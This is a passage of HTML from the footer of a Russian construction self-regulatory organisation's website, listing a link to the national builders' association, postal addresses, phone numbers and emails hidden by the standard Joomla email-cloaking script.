 //-->
 </script></span></td>
</tr>
<tr>
<td><a href="http://www.nostroy.ru/" target="_blank"><img src="/images/logoNOSTROY.png" alt="Национальное объединение строителей" width="90" style="margin: 10px auto; vertical-align: middle; display: block;" /></a></td>
<td style="vertical-align: middle; font-size: 8pt;"><a href="http://www.nostroy.ru/" target="_blank" style="vertical-align: middle;">Ассоциация "Общероссийская негосударственная некоммерческая организация - Общероссийское отраслевое объединение работодателей "Национальное объединение саморегулируемых организаций, основанных на членстве лиц, осуществляющих строительство"</a></td>
<td>
<p><span style="font-size: 8pt;">&nbsp;123242, г. Москва, ул. Малая Грузинская, д. 3<br />8 (495) 987-31-50<br /><span id="cloak75924">Этот адрес электронной почты защищен от спам-ботов. У вас должен быть включен JavaScript для просмотра.</span><script type='text/javascript'>
 //<!--
 document.getElementById('cloak75924').innerHTML = '';
 var prefix = '&#109;a' + 'i&#108;' + '&#116;o';
 var path = 'hr' + 'ef' + '=';
 var addy75924 = '&#105;nf&#111;' + '&#64;';
 addy75924 = addy75924 + 'n&#111;str&#111;y' + '&#46;' + 'r&#117;';
 var addy_text75924 = '&#105;nf&#111;' + '&#64;' + 'n&#111;str&#111;y' + '&#46;' + 'r&#117;';
 document.getElementById('cloak75924').innerHTML += '<a ' + path + '\'' + prefix + ':' + addy75924 + '\'>'+addy_text75924+'<\/a>';
 //-->
 </script></span></p>
</td>
</tr>
</tbody>
</table>		
</div></div></section>
				
		

	</div>
		
	
	<div id="block-bottom-b">
	
		</div>
	
	
		<div id="block-footer">
	
		<div class="wrapper">
			
			<footer id="footer" class="grid-block">
	
								<a id="totop-scroller" href="#page"></a>
								
				<div class="module   deepest">

			
	<p style="float: left; text-align: left;"><span style="font-size: 12pt; font-family: 'Times New Roman','serif';">Юридический адрес: 142000, Московская обл., г.Домодедово, микрорайон Северный, ул. Лесная, д.8<br />Адрес приема документов: 105064, г. Москва, Садовая-Черногрязская ул., д.13/3, к.1<br />Тел.: <span style="font-size: 12pt; font-family: 'Times New Roman', 'serif';">8 (495) 902-74-83</span>; 8 (495) 505-06-33 <br />Электронная почта: <span id="cloak85561">Этот адрес электронной почты защищен от спам-ботов. У вас должен быть включен JavaScript для просмотра.</span><script type='text/javascript'>
 //<!--
 document.getElementById('cloak85561').innerHTML = '';
 var prefix = '&#109;a' + 'i&#108;' + '&#116;o';
 var path = 'hr' + 'ef' + '=';
 var addy85561 = '&#105;nf&#111;' + '&#64;';
 addy85561 = addy85561 + 'sr&#111;-mrs&#97;' + '&#46;' + 'r&#117;';
 document.getElementById('cloak85561').innerHTML += '<a ' + path + '\'' + prefix + ':' + addy85561 + '\'>' + addy85561+'<\/a>';
 //-->
 </script></span></p>
<p style="float: right; margin-top: 40px;"><a href="/index.php/sitemap">Карта сайта</a></p>		
</div>	
			</footer>
		
		</div>
		
	</div>
		
		
</body>
</html>